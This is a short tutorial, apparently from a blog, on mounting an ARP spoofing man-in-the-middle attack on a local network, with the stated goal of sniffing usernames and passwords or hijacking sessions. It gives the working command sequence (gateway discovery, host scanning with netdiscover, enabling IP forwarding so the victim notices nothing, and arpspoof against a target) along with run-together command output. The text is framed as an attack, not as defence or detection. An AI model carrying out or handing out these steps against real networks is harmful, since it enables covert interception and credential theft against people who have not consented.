This technique creates a Man-In-The-Middle situation, so that we can modifiy the communication in any way we want or just listen to it with a sniffer to find out usernames/passwords or hijack sessions.
1. First we have to find out the ip address of the router/gateway.
$ ip routedefault via 192.168.2.1 dev eth0 proto dhcp metric 600 192.168.2.0/24 dev eth0 proto kernel scope link src 192.168.2.106 metric 600 |
2. Now we have to find out the ip address of our target.
$ netdiscover -r 192.168.2.0/24Currently scanning: Finished! | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 2 hosts. Total size: 228 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.2.1 9c:80:df:4f:df:e0 4 168 Arcadyan Technology Corporat192.168.2.117 bc:5f:f4:83:b1:2e 1 60 ASRock Incorporation |
3. To let the target know nothing, just forward the communication.
$ echo 1 > /proc/sys/net/ipv4/ip_forward |
4. Start with the arp spoofing, to receive all the communication happens.
$ arpspoof -i eth0 -t 192.168.2.117 -r 192.168.2.178:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:4478:e4:0:93:ec:44 9c:80:df:4f:df:e0 0806 42: arp reply 192.168.2.117 is-at 78:e4:0:93:ec:4478:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:4478:e4:0:93:ec:44 9c:80:df:4f:df:e0 0806 42: arp reply 192.168.2.117 is-at 78:e4:0:93:ec:44... |
Now we are sending non stop unrequested arp resonses to the router/gateway and to the target. We are telling the router/gateway that our mac address is the new one from the target and to the target that our mac address is the new one from the router.